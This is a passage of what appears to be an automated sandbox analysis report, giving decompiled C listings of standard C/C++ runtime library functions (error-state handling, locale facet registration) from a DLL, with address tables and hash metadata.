				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = E6E254E0A( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E6E24C7EF(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E6E24CBD3(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = E6E254E0A(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E6E24E486(_t97, _t103, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E6E242188();
							asm("int3");
							E6E220990(_t97, _t123, 0x6e2c2bc0, 0x1c);
							_t130 = _a4;
							_t75 = E6E2423DD(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = E6E24D5FF(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E6E2550ED( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E6E24F26D(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E6E2550ED( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E6E242361(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E6E24CBD3( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x6e2c52ec & 0x00000001;
												if(( *0x6e2c52ec & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E6E24CBD3( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E6E2425CE();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E6E24CBD3(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E6E242188();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E6E2209D6();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E6E24E486(__ebx, _t101, _a4, 0);
					L12:
					return _t70;
				}
			}



































                          0x6e2423dd
                          0x6e2423dd
                          0x6e2423e2
                          0x6e2423e7
                          0x6e2423f7
                          0x6e2423f8
                          0x6e242401
                          0x6e242409
                          0x6e24240e
                          0x6e242411
                          0x6e242413
                          0x6e24241f
                          0x6e242429
                          0x6e24242c
                          0x6e24242d
                          0x6e24242f
                          0x6e242460
                          0x6e242461
                          0x6e242467
                          0x00000000
                          0x6e242431
                          0x6e24243b
                          0x6e242440
                          0x6e242443
                          0x6e242445
                          0x6e24245e
                          0x00000000
                          0x6e242447
                          0x6e242447
                          0x6e24244a
                          0x00000000
                          0x6e24244c
                          0x6e24244c
                          0x6e24244f
                          0x00000000
                          0x6e242451
                          0x00000000
                          0x6e242451
                          0x6e24244f
                          0x6e24244a
                          0x6e242445
                          0x6e242415
                          0x6e242415
                          0x6e242418
                          0x6e24246f
                          0x6e24246f
                          0x6e242470
                          0x6e242471
                          0x6e242472
                          0x6e242474
                          0x6e242479
                          0x6e242481
                          0x6e242489
                          0x6e24248d
                          0x6e242493
                          0x6e242494
                          0x6e242496
                          0x6e242498
                          0x6e2424a1
                          0x6e2424a6
                          0x6e2424ac
                          0x6e2424af
                          0x6e2424b2
                          0x6e2424b7
                          0x6e2424c6
                          0x6e2424cb
                          0x6e2424ce
                          0x6e2424d0
                          0x6e2424ea
                          0x6e2424f7
                          0x6e2424f9
                          0x6e2424fb
                          0x00000000
                          0x6e2424fd
                          0x6e2424fd
                          0x6e242500
                          0x6e242503
                          0x6e24250e
                          0x6e242511
                          0x6e242516
                          0x6e242519
                          0x6e24251b
                          0x6e24253e
                          0x6e24253e
                          0x6e242543
                          0x6e242548
                          0x6e242549
                          0x6e24254d
                          0x6e242553
                          0x6e242556
                          0x6e242558
                          0x6e24255c
                          0x6e242560
                          0x6e242566
                          0x6e24256b
                          0x6e24256c
                          0x6e242571
                          0x6e242571
                          0x6e242571
                          0x6e242560
                          0x6e242574
                          0x6e242577
                          0x6e24257e
                          0x6e242580
                          0x6e242587
                          0x6e24258d
                          0x6e24258f
                          0x6e242591
                          0x6e242595
                          0x6e242596
                          0x6e24259c
                          0x6e2425a2
                          0x6e2425a2
                          0x6e2425a2
                          0x6e2425a2
                          0x6e242596
                          0x6e24258f
                          0x6e242587
                          0x6e2425aa
                          0x6e2425ac
                          0x6e2425b3
                          0x6e2425b7
                          0x6e2425be
                          0x6e24251d
                          0x6e24251d
                          0x6e242520
                          0x6e242527
                          0x6e242527
                          0x6e242528
                          0x6e242529
                          0x6e24252a
                          0x6e24252b
                          0x00000000
                          0x6e242522
                          0x6e242522
                          0x6e242525
                          0x6e24252e
                          0x6e242530
                          0x00000000
                          0x6e242532
                          0x6e242533
                          0x00000000
                          0x6e242538
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e242525
                          0x6e242520
                          0x6e24251b
                          0x6e2424d2
                          0x6e2424d2
                          0x6e2424d5
                          0x6e2424dc
                          0x6e2424dc
                          0x6e2424dd
                          0x6e2424de
                          0x6e2424df
                          0x6e2424e0
                          0x6e2424e1
                          0x6e2424e1
                          0x6e2424d7
                          0x6e2424d7
                          0x6e2424da
                          0x00000000
                          0x00000000
                          0x6e2424da
                          0x6e2424e6
                          0x6e2424e8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e2424e8
                          0x6e24249a
                          0x6e24249a
                          0x6e24249a
                          0x6e2425ca
                          0x6e24241a
                          0x6e24241a
                          0x6e24241d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24241d
                          0x6e242418
                          0x6e2423e9
                          0x6e2423ee
                          0x6e24246b
                          0x6e24246e
                          0x6e24246e

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __cftoe
                          • String ID:
                          • API String ID: 4189289331-0
                          • Opcode ID: b1901bf1e62d4546a32aea3a0132dc3de237da540ddccdd112241b2f9ac0d7e2
                          • Instruction ID: b04693f176100f01ff8d8e5a36528e08456677cf2f239af8ae628ca8f22cae23
                          • Opcode Fuzzy Hash: b1901bf1e62d4546a32aea3a0132dc3de237da540ddccdd112241b2f9ac0d7e2
                          • Instruction Fuzzy Hash: 8F51D8B790420EEBEB5C8BEACC51E9E77BFEB49725F104519E825E7181EF34D5008660
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2242C8, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 79%
                          			E6E2242C8(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x6e2c5090 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E6E2256A9(__eflags,  *0x6e2c5090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6E2256E4(__eflags,  *0x6e2c5090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t29 = E6E22B9EA(_t16);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6E2256E4(__eflags,  *0x6e2c5090, 0);
								} else {
									__eflags = E6E2256E4(__eflags,  *0x6e2c5090, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L6E241DEB(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}








                          0x6e2242cf
                          0x6e2242e2
                          0x6e2242e9
                          0x6e2242ec
                          0x6e2242ef
                          0x6e224308
                          0x6e224308
                          0x6e2242f1
                          0x6e2242f1
                          0x6e2242f3
                          0x6e2242fd
                          0x6e224303
                          0x6e224304
                          0x6e224306
                          0x6e22430d
                          0x6e22430f
                          0x6e224316
                          0x6e22431a
                          0x6e22431c
                          0x6e224330
                          0x6e224330
                          0x6e224339
                          0x6e22431e
                          0x6e22432c
                          0x6e22432e
                          0x6e224342
                          0x6e224344
                          0x6e224344
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e22432e
                          0x6e224347
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e224306
                          0x6e2242f3
                          0x6e22434f
                          0x6e224359
                          0x6e2242d1
                          0x6e2242d3
                          0x6e2242d3

                          APIs
                          • GetLastError.KERNEL32(00000001,?,6E223EDB,6E21FA25,6E21FD54,?,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E), ref: 6E2242D6
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2242E4
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2242FD
                          • SetLastError.KERNEL32(00000000,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E,?,00000001,?), ref: 6E22434F
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 11ca3798cb17ab8f4ad984dd8a1ade486fa50c10c5678894769fdd25300c3403
                          • Instruction ID: f1dbadee7f91d3c947d3c483ba98e15bbc5920e0da9bb9bb820dfe588d201991
                          • Opcode Fuzzy Hash: 11ca3798cb17ab8f4ad984dd8a1ade486fa50c10c5678894769fdd25300c3403
                          • Instruction Fuzzy Hash: 4201703615DB2B5FD78405F5AC9DA97376BEB17B7A330833AF014850D8EF528802C190
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20FA97, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20FA97(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t198 - 0x14, 0);
				_t189 =  *0x6e2c6dfc; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6E1E161C(0x6e2c6da8);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6E2066BA(_t198 - 0x14);
					return E6E220075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6E2114EC(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t198 - 0x20);
							E6E223D74(_t198 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t184, _t189, 0x14);
							E6E206653(_t198 - 0x14, 0);
							_t190 =  *0x6e2c6dcc; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6E1E161C(0x6e2c6d80);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6E2066BA(_t198 - 0x14);
								return E6E220075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6E211558(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t198 - 0x20);
										E6E223D74(_t198 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t141, _t185, _t190, 0x14);
										E6E206653(_t198 - 0x14, 0);
										_t191 =  *0x6e2c6e00; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6E1E161C(0x6e2c6dac);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6E2066BA(_t198 - 0x14);
											return E6E220075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6E2115C4(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t198 - 0x20);
													E6E223D74(_t198 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t141, _t186, _t191, 0x14);
													E6E206653(_t198 - 0x14, 0);
													_t192 =  *0x6e2c6dd0; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6E1E161C(0x6e2c6d60);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6E2066BA(_t198 - 0x14);
														return E6E220075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6E21162A(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6E1E1438(_t169);
																E6E223D74(_t198 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e26851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6e26c0c4;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6E21542F(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6E220075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6E206FD3(__eflags, _t187);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6e2c6dd0 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6E206FD3(__eflags, _t186);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6e2c6e00 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6E206FD3(__eflags, _t185);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6e2c6dcc = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6E206FD3(__eflags, _t184);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6e2c6dfc = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}


















                          0x6e20fa97
                          0x6e20fa97
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20fac8
                          0x6e20facd
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20FA9E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FAA8
                          • int.LIBCPMT ref: 6E20FABF
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20FAF9
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FB19
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FB37
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 0d2e6529828d6831b67168bd0fa987845102d9951ce64d97a50c9e9ae958fe24
                          • Instruction ID: f404a529c8d1b5821af0a7ab00ac64639aab1fa7b517d80822bcfb7494d569a5
                          • Opcode Fuzzy Hash: 0d2e6529828d6831b67168bd0fa987845102d9951ce64d97a50c9e9ae958fe24
                          • Instruction Fuzzy Hash: DA11067AA0051E8FCF00DBE0C894AEEB77BBF44B14F244919E4116B2D0DF749A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20FB3D, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E20FB3D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t154 - 0x14, 0);
				_t147 =  *0x6e2c6dcc; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6E1E161C(0x6e2c6d80);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6E2066BA(_t154 - 0x14);
					return E6E220075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6E211558(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t154 - 0x20);
							E6E223D74(_t154 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t143, _t147, 0x14);
							E6E206653(_t154 - 0x14, 0);
							_t148 =  *0x6e2c6e00; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6E1E161C(0x6e2c6dac);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6E2066BA(_t154 - 0x14);
								return E6E220075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6E2115C4(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t154 - 0x20);
										E6E223D74(_t154 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t110, _t144, _t148, 0x14);
										E6E206653(_t154 - 0x14, 0);
										_t149 =  *0x6e2c6dd0; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6E1E161C(0x6e2c6d60);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6E2066BA(_t154 - 0x14);
											return E6E220075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6E21162A(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6E1E1438(_t131);
													E6E223D74(_t154 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e26851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
